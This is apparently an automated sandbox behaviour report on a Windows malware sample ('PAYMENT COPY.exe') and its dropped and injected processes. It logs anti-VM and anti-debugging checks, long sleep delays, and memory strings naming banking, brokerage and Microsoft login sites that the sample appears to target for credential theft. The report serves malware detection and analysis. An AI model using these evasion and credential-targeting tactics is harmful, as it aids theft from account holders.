Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: bQrgcvrrXfGN.exe PID: 3472, type: MEMORYSTR

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 4A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 7450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 8450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 86F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 7790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 8790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory allocated: 7790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Code function: 9_2_0150096E rdtsc

9_2_0150096E

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2416	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2941	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Window / User API: threadDelayed 3092	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Window / User API: threadDelayed 6881	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\gpresult.exe	API coverage: 2.5 %

Source: C:\Users\user\Desktop\PAYMENT COPY.exe TID: 6784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe TID: 6424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep count: 3092 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep time: -6184000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep count: 6881 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe TID: 6796	Thread sleep time: -13762000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -90000s >= -30000s
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -43000s >= -30000s
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep count: 39 > 30
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe TID: 6908	Thread sleep time: -58500s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\gpresult.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\gpresult.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\gpresult.exe

Code function: 13_2_0087C050 FindFirstFileW,FindNextFileW,FindClose,

13_2_0087C050

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 4jm-6-hL7.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj(B
Source: 4jm-6-hL7.13.dr	Binary or memory string: discord.comVMware20,11696508427f
Source: 4jm-6-hL7.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4946464511.000000000063F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: 4jm-6-hL7.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zure.comVMware20,11696508427j
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: 4jm-6-hL7.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: 4jm-6-hL7.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: 4jm-6-hL7.13.dr	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: bQrgcvrrXfGN.exe, 0000000A.00000002.2587508838.000000000752E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bQrgcvrrXfGN.exe, 0000000A.00000002.2587508838.000000000752E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_
Source: 4jm-6-hL7.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169650
Source: 4jm-6-hL7.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: 4jm-6-hL7.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: 4jm-6-hL7.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: firefox.exe, 00000015.00000002.2995656460.0000022CE085C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: 4jm-6-hL7.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: 4jm-6-hL7.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: 4jm-6-hL7.13.dr	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: 4jm-6-hL7.13.dr	Binary or memory string: global block list test formVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,116~
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169650842"
Source: 4jm-6-hL7.13.dr	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: 4jm-6-hL7.13.dr	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: 4jm-6-hL7.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: 4jm-6-hL7.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: 4jm-6-hL7.13.dr	Binary or memory string: AMC password management pageVMware20,11696508427
Source: gpresult.exe, 0000000D.00000002.4952306418.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\gpresult.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Code function: 9_2_0150096E rdtsc

9_2_0150096E

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Code function: 9_2_00417F13 LdrLoadDll,

9_2_00417F13

